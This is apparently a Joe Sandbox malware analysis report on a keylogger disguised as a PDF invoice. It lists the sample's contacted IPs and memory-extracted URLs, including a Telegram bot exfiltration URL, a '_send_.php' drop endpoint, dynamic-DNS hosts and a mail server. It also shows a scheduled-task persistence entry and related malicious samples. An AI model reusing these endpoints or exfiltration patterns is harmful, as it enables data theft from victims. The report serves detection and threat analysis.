                                                    https://reallyfreegeoip.org/xml/173.254.250.82$Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.00000000028F7000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002BAF000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://checkip.dyndns.orgProforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002871000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002BFA000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.00000000039C7000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003B44000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003952000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003AF6000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.00000000039A0000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002974000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003EDA000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003DB7000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C13000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002974000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://reallyfreegeoip.org/xml/173.254.250.824Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002BF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://www.carterandcone.comlProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://aborters.duckdns.org:8081Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4175099476.0000000000433000.00000040.00000400.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://www.fontbureau.com/designers/cabarga.htmlNProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20aProforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002974000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://www.founder.com.cn/cnProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/frere-user.htmlProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://51.38.247.67:8081/_send_.php?LProforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://anotherarmy.dns.army:8081Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4175099476.0000000000433000.00000040.00000400.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://www.jiyu-kobo.co.jp/Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://reallyfreegeoip.orgProforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers8Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesProforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003BF5000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003AFE000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.000000000395A000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.000000000392D000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.00000000039A2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003AD1000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003BEE000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C63000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003DBD000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003EB7000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4175064237.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://crl.microsProforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4192935936.0000000006080000.00000004.00000020.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4192502862.00000000061D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      149.154.167.220
                                                                      		api.telegram.orgUnited Kingdom
                                                                      		62041TELEGRAMRUtrue
                                                                      188.114.96.3
                                                                      		reallyfreegeoip.orgEuropean Union
                                                                      		13335CLOUDFLARENETUStrue
                                                                      193.122.130.0
                                                                      		checkip.dyndns.comUnited States
                                                                      		31898ORACLE-BMC-31898USfalse
                                                                      208.91.199.223
                                                                      		us2.smtp.mailhostbox.comUnited States
                                                                      		394695PUBLIC-DOMAIN-REGISTRYUStrue

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1535758
                                                                      Start date and time:2024-10-17 09:43:39 +02:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 9m 59s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:18
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@20/11@4/4
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 186
                                                                      • Number of non-executed functions: 18
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                      • VT rate limit hit for: Proforma Invoice_21-1541 And Packing List.pdf.exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      03:44:36API Interceptor8410267x Sleep call for process: Proforma Invoice_21-1541 And Packing List.pdf.exe modified
                                                                      03:44:38API Interceptor12x Sleep call for process: powershell.exe modified
                                                                      03:44:43API Interceptor5847877x Sleep call for process: vrhZELiHpiub.exe modified
                                                                      08:44:42Task SchedulerRun new task: vrhZELiHpiub path: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      149.154.167.220QeV3tjOEuM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        Quotation Botisk 1475-HIRSCH Technik,____________________________________________.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          quotation list 1.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            Scanned Copy.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              AF1cyL4cv6.vbsGet hashmaliciousAsyncRATBrowse
                                                                                FRi4mYXiwD.ps1Get hashmaliciousAsyncRATBrowse
                                                                                  FmpQycTC2G.ps1Get hashmaliciousAsyncRATBrowse
                                                                                    4d5ZJqq0M7.vbsGet hashmaliciousAsyncRATBrowse
                                                                                      Purchase-Order_SSO2345.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        E-COURT NOTICE.htmlGet hashmaliciousUnknownBrowse
                                                                                          188.114.96.3zygWTMeQC2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                          • 138231cm.n9shteam.in/CpuApiprotectTemp.php
                                                                                          PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.cc101.pro/ttiz/
                                                                                          Aunali_khokhawala-In Services.Agreement-SDYAMPA 416944.rtfGet hashmaliciousEvilProxy, Fake Captcha, HTMLPhisherBrowse
                                                                                          • vh26kx.pinboarddisplaced.com/?email=
                                                                                          SMX-ACH0036173.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • www.casesrep.site/7z6q/
                                                                                          http://sss-mmm-yyy.ru/Get hashmaliciousUnknownBrowse
                                                                                          • sss-mmm-yyy.ru/assets/img/emoji/1f1ff-1f1fc.png
                                                                                          DRAFT DOC2406656.bat.exeGet hashmaliciousLokibotBrowse
                                                                                          • touxzw.ir/sirr/five/fre.php
                                                                                          lv961v43L3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                          • 863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
                                                                                          10092024150836 09.10.2024.vbeGet hashmaliciousFormBookBrowse
                                                                                          • www.airgame.store/ojib/
                                                                                          Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.cc101.pro/59fb/
                                                                                          octux.exe.exeGet hashmaliciousUnknownBrowse
                                                                                          • servicetelemetryserver.shop/api/index.php
                                                                                          193.122.130.0Payment Advise.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          quotation list 1.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          Scanned Copy.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          QUOTATION.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          ACCOUNT STATEMENT.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          MeohlnK0WH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          Swift Copy Of Pending payment.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          z95ReviseInvoice_USD_.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          z88Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • checkip.dyndns.org/

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          reallyfreegeoip.orgPyt Copy.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          QeV3tjOEuM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          Quotation Botisk 1475-HIRSCH Technik,____________________________________________.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          quotation list 1.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          Scanned Copy.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          QUOTATION.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 188.114.97.3
                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          Purchase-Order_SSO2345.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          ACGH8aovg0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          us2.smtp.mailhostbox.comTax Invoice 103505.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 208.91.199.224
                                                                                          PO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 208.91.199.223
                                                                                          Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 208.91.198.143
                                                                                          Scanned.pdf.pif.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 208.91.199.225
                                                                                          Request for Quotation Plug Valve.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 208.91.199.223
                                                                                          Cotizaci#U00f3n P13000996 pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 208.91.198.143
                                                                                          ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 208.91.199.225
                                                                                          Payment Advice - Advice Ref pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 208.91.199.224
                                                                                          Purchase Order 007823-PO# 005307.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 208.91.199.223
                                                                                          SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 208.91.199.225
                                                                                          checkip.dyndns.comPayment Advise.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          Pyt Copy.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          QeV3tjOEuM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.6.168
                                                                                          Quotation Botisk 1475-HIRSCH Technik,____________________________________________.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.6.168
                                                                                          quotation list 1.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          Scanned Copy.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          QUOTATION.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 193.122.130.0
                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 132.226.8.169
                                                                                          na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          Purchase-Order_SSO2345.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          api.telegram.orgQeV3tjOEuM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Quotation Botisk 1475-HIRSCH Technik,____________________________________________.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          quotation list 1.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Scanned Copy.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          AF1cyL4cv6.vbsGet hashmaliciousAsyncRATBrowse
                                                                                          • 149.154.167.220
                                                                                          FRi4mYXiwD.ps1Get hashmaliciousAsyncRATBrowse
                                                                                          • 149.154.167.220
                                                                                          FmpQycTC2G.ps1Get hashmaliciousAsyncRATBrowse
                                                                                          • 149.154.167.220
                                                                                          4d5ZJqq0M7.vbsGet hashmaliciousAsyncRATBrowse
                                                                                          • 149.154.167.220
                                                                                          Purchase-Order_SSO2345.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          E-COURT NOTICE.htmlGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          TELEGRAMRUQeV3tjOEuM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Quotation Botisk 1475-HIRSCH Technik,____________________________________________.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          quotation list 1.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Scanned Copy.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          AF1cyL4cv6.vbsGet hashmaliciousAsyncRATBrowse
                                                                                          • 149.154.167.220
                                                                                          FRi4mYXiwD.ps1Get hashmaliciousAsyncRATBrowse
                                                                                          • 149.154.167.220
                                                                                          FmpQycTC2G.ps1Get hashmaliciousAsyncRATBrowse
                                                                                          • 149.154.167.220
                                                                                          4d5ZJqq0M7.vbsGet hashmaliciousAsyncRATBrowse
                                                                                          • 149.154.167.220
                                                                                          Purchase-Order_SSO2345.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          E-COURT NOTICE.htmlGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          CLOUDFLARENETUSm68k.elfGet hashmaliciousMiraiBrowse
                                                                                          • 1.13.147.12
                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                          • 104.21.53.8
                                                                                          Pyt Copy.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          QeV3tjOEuM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          m68k.elfGet hashmaliciousMiraiBrowse
                                                                                          • 104.17.182.127
                                                                                          7kyrTho2jq.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.26.13.205
                                                                                          Order 10172024.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 104.26.12.205
                                                                                          polwRBk6mA.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.26.13.205
                                                                                          nsdtpYrJ6m.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 104.16.231.132
                                                                                          ebY8mbOLk4.lnkGet hashmaliciousUnknownBrowse
                                                                                          • 104.16.231.132
                                                                                          ORACLE-BMC-31898USmipsel.elfGet hashmaliciousMiraiBrowse
                                                                                          • 129.147.170.47
                                                                                          Payment Advise.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          arm7.elfGet hashmaliciousUnknownBrowse
                                                                                          • 193.122.239.177
                                                                                          QeV3tjOEuM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.6.168
                                                                                          Quotation Botisk 1475-HIRSCH Technik,____________________________________________.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          quotation list 1.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          New PO1 and Invoice1.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 150.136.81.248
                                                                                          Scanned Copy.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          QUOTATION.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 193.122.130.0
                                                                                          j2qv9oE81X.elfGet hashmaliciousMiraiBrowse
                                                                                          • 152.67.248.95
                                                                                          PUBLIC-DOMAIN-REGISTRYUShttps://pg9t70xx.r.us-east-1.awstrack.me/L0/https:%2F%2Fjustworks.app.link%2F%3F%24deeplink_path=%2Falerts%2Ftime_off_requests%2F13a6b7f0-b2ae-4165-87b0-da6673653a54%26%24fallback_url=http%253A%252F%252Fwww.google.com.sg%252Furl%253Fsa%253Dt%2526esrc%253DYUM58NDu%2526source%253D%2526rct%253D304J%2526%2526cd%253D256Du%2526uact%2526url%253Damp%252Fs%252F%2573%2579%2573%2562%2569%257A%257A%252E%2569%256E%252F%252E%2564%2572%2565%256E%2574%256F%2570%252F%23dm1hbnRocmlwcmFnYWRhQG1vbnRyb3NlLWVudi5jb20=/1/0100019291d15735-3d3bd509-ef84-4bb4-a854-1b8c9d0b05f9-000000/-gk1ZN3uoUfApTKZkXOmptm9MGY=396Get hashmaliciousUnknownBrowse
                                                                                          • 103.21.58.15
                                                                                          Remittance copy.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 103.53.40.140
                                                                                          sgJV11UlDP.exeGet hashmaliciousGuLoader, XWormBrowse
                                                                                          • 103.53.40.62
                                                                                          c56D7_Receipt.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                          • 103.53.40.62
                                                                                          IMG0001.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 199.79.62.115
                                                                                          Tax Invoice 103505.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 208.91.199.224
                                                                                          Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 207.174.215.249
                                                                                          PO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 208.91.199.223
                                                                                          Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 208.91.198.143
                                                                                          Documents.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 207.174.215.249

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          54328bd36c14bd82ddaa0c04b25ed9adPyt Copy.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          QeV3tjOEuM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          QUOTATION.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 188.114.96.3
                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          Purchase-Order_SSO2345.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          ACGH8aovg0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          #U898b#U7a4d#U4f9d#U983c.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          SecuriteInfo.com.Win32.MalwareX-gen.18789.18997.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          20042024150836 14.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          3b5074b1b5d032e5620f69f9f700ff0ePyt Copy.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          QeV3tjOEuM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Order 10172024.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 149.154.167.220
